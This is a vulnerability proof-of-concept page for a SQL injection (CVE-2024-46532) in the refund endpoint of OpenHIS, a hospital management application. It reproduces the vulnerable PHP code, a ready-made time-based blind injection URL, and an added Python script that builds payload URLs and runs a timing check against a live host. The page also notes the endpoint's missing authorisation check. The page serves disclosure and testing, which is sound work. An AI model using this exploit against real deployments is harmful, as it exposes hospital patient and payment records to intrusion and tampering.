
CVE-2024-46532 PoC — OpenHIS 安全漏洞

Source
Associated Vulnerability
Title: OpenHIS security vulnerability (CVE-2024-46532)
Description: OpenHIS is a web-based hospital management application from the Chinese company Xinzhi (新致, OpenHIS). OpenHIS v1.0 contains a security vulnerability: the refund function in the PayController.class.php component builds a SQL statement from request input and is vulnerable to SQL injection.
Description
Reproduction of SQL Injection Vulnerabilities in OpenHIS
Readme
# CVE-2024-46532
Reproduction of SQL Injection Vulnerabilities in OpenHIS

Vulnerable file: OpenHIS-master/Application/His/Controller/PayController.class.php

Source link: https://github.com/1638824607/OpenHIS?tab=readme-ov-file

Vulnerability code (the refund() method of PayController.class.php; the original method continues past the lines shown here):
    public function refund()
    {
        // Request input read through the framework helper I(). In a ThinkPHP 3.x-style
        // application the default input filter is htmlspecialchars(), which on PHP
        // before 8.1 leaves the single quote untouched, so nothing here neutralises it.
        $paylog_id = I('get.paylog_id',0);

        $amount = I('post.amount','all');// 'all' means refund the full amount
        $adm_uid = I('post.adm_uid',0);
        $adm_memo = I('post.adm_memo','退款');// default memo text: "refund"

        if(!$paylog_id||!$amount)$this->resJSON(1,'参数缺失:paylog_id or amount');// "missing parameter: paylog_id or amount"

        #todo a permission check still has to be added here; without one the refund endpoint can be called without authorisation

        // $paylog_id is concatenated straight into the SQL text inside a single-quoted
        // literal, so a quote in the parameter ends the literal and the remainder is
        // parsed as SQL. This is the injection point.
        $sql = "SELECT a.*,b.hospital_id,b.type_id,b.order_code,b.ol_pay_part,b.amount,b.patient_id FROM ".$this->tab_pre."his_care_paylog a LEFT JOIN ".$this->tab_pre."his_care_pkg b ON a.pkg_id=b.id WHERE a.id='$paylog_id' LIMIT 1";

        $r = $this->db->query($sql);
        // "invalid paylog_id": on an empty or failed result the raw $sql is echoed back to the client
        if(!$r)$this->resJSON(2,'paylog_id无效',$sql);
        // ... (the refund logic that follows is not part of the published excerpt)
    }

POC:
  /index.php/pay/refund?paylog_id=aaaa'+or+sleep(.6)+--+

After URL decoding, the WHERE clause becomes `WHERE a.id='aaaa' or sleep(.6) -- ' LIMIT 1`: the quote closes the string literal, `or sleep(.6)` is evaluated for every row the scan touches (sleep() returns 0, so no row matches and the scan does not stop early), and `--` followed by the space encoded as `+` comments out the original closing quote and the LIMIT. A vulnerable instance therefore answers measurably later than it does for a plain numeric id, and the delay grows with the number of rows in his_care_paylog, so keep the sleep short and the client timeout generous. Because the error branch returns the built SQL in the response body, the injected statement can also be read back directly, which confirms the injection without a timing measurement.
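The mechanics above as a worked example (added here; this is not code from the OpenHIS project or from the PoC README): a Python script that renders the exact query refund() executes for the PoC parameter, shows the hardened placeholder form beside it, and performs the baseline-versus-sleep timing comparison a tester uses to confirm the blind injection. The table prefix `tb_`, the host `openhis.example`, the treatment of paylog_id as an unsigned integer, and `fake_mysql_roundtrip` are assumptions or constructed stand-ins; only `http_roundtrip` touches the network, and only when you call it.

```python
"""Added example: not code from OpenHIS or from the PoC README.

Reconstructs the SQL that refund() builds from the untrusted paylog_id
parameter and runs the timing check for the time-based blind injection.
The transport is a callable so the module runs offline.
"""
import re
import time
from statistics import median
from urllib.error import HTTPError
from urllib.parse import quote_plus
from urllib.request import urlopen

# Assumption: $this->tab_pre is a table-name prefix; its real value is not on the page.
TAB_PRE = "tb_"

# URL-decoded form of the PoC parameter:  paylog_id=aaaa'+or+sleep(.6)+--+
POC_PAYLOAD = "aaaa' or sleep(.6) -- "


def render_refund_query(paylog_id: str) -> str:
    """Mirror the string concatenation in refund() exactly (the vulnerable form)."""
    return (
        "SELECT a.*,b.hospital_id,b.type_id,b.order_code,b.ol_pay_part,b.amount,b.patient_id "
        f"FROM {TAB_PRE}his_care_paylog a LEFT JOIN {TAB_PRE}his_care_pkg b ON a.pkg_id=b.id "
        f"WHERE a.id='{paylog_id}' LIMIT 1"
    )


def render_refund_query_safe(paylog_id) -> tuple:
    """Hardened form: validate the id and keep it out of the SQL text.

    Returns (sql_with_placeholder, params) for a prepared statement. The
    controller defaults paylog_id to 0, so it is treated as an unsigned integer
    (assumption) and anything else is rejected before any SQL is built.
    """
    raw = str(paylog_id)
    if not re.fullmatch(r"[0-9]{1,18}", raw):
        raise ValueError("paylog_id must be an unsigned integer")
    sql = (
        "SELECT a.*,b.hospital_id,b.type_id,b.order_code,b.ol_pay_part,b.amount,b.patient_id "
        f"FROM {TAB_PRE}his_care_paylog a LEFT JOIN {TAB_PRE}his_care_pkg b ON a.pkg_id=b.id "
        "WHERE a.id=? LIMIT 1"
    )
    return sql, (int(raw),)


def build_poc_url(base_url: str, seconds: float) -> str:
    """Same shape as the README's PoC URL, with the sleep length as a knob."""
    payload = f"aaaa' or sleep({seconds:g}) -- "
    return f"{base_url}/index.php/pay/refund?paylog_id={quote_plus(payload)}"


def http_roundtrip(url: str, timeout: float = 60.0) -> float:
    """Real transport: seconds until a response (or HTTP error) comes back.

    refund() answers the PoC with an error JSON, possibly under a non-200
    status, so an HTTPError is still a timed response rather than a failure.
    """
    start = time.monotonic()
    try:
        urlopen(url, timeout=timeout).read()
    except HTTPError:
        pass
    return time.monotonic() - start


def fake_mysql_roundtrip(url: str) -> float:
    """Constructed stand-in for a vulnerable server: reads sleep(N) out of the
    URL the way MySQL would execute it and reports 50 ms base latency plus N.
    It does not actually sleep, so the offline run is instant."""
    m = re.search(r"sleep%28([0-9.]+)%29", url)
    return 0.05 + (float(m.group(1)) if m else 0.0)


def timing_check(roundtrip, base_url: str, delay: float = 0.6, samples: int = 3) -> bool:
    """True when the injected sleep() measurably delays the response.

    Compares the median of `samples` requests with a harmless id against the
    median with sleep(delay) injected, so a single slow packet cannot fake a
    hit. The threshold is half the requested delay, leaving room for jitter.
    """
    control = f"{base_url}/index.php/pay/refund?paylog_id=1"
    injected = build_poc_url(base_url, delay)
    t_control = median(roundtrip(control) for _ in range(samples))
    t_injected = median(roundtrip(injected) for _ in range(samples))
    return (t_injected - t_control) >= delay / 2


if __name__ == "__main__":
    print(render_refund_query(POC_PAYLOAD))
    print(build_poc_url("http://openhis.example", 0.6))
    print("injectable (simulated):", timing_check(fake_mysql_roundtrip, "http://openhis.example"))
    # Against an instance you are authorised to test:
    # print("injectable:", timing_check(http_roundtrip, "http://openhis.example"))
```

The median over several samples is what separates a real hit from network jitter; with a real target the sleep is executed once per row scanned, so the `timeout` passed to `http_roundtrip` has to exceed `delay` times the row count of his_care_paylog.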
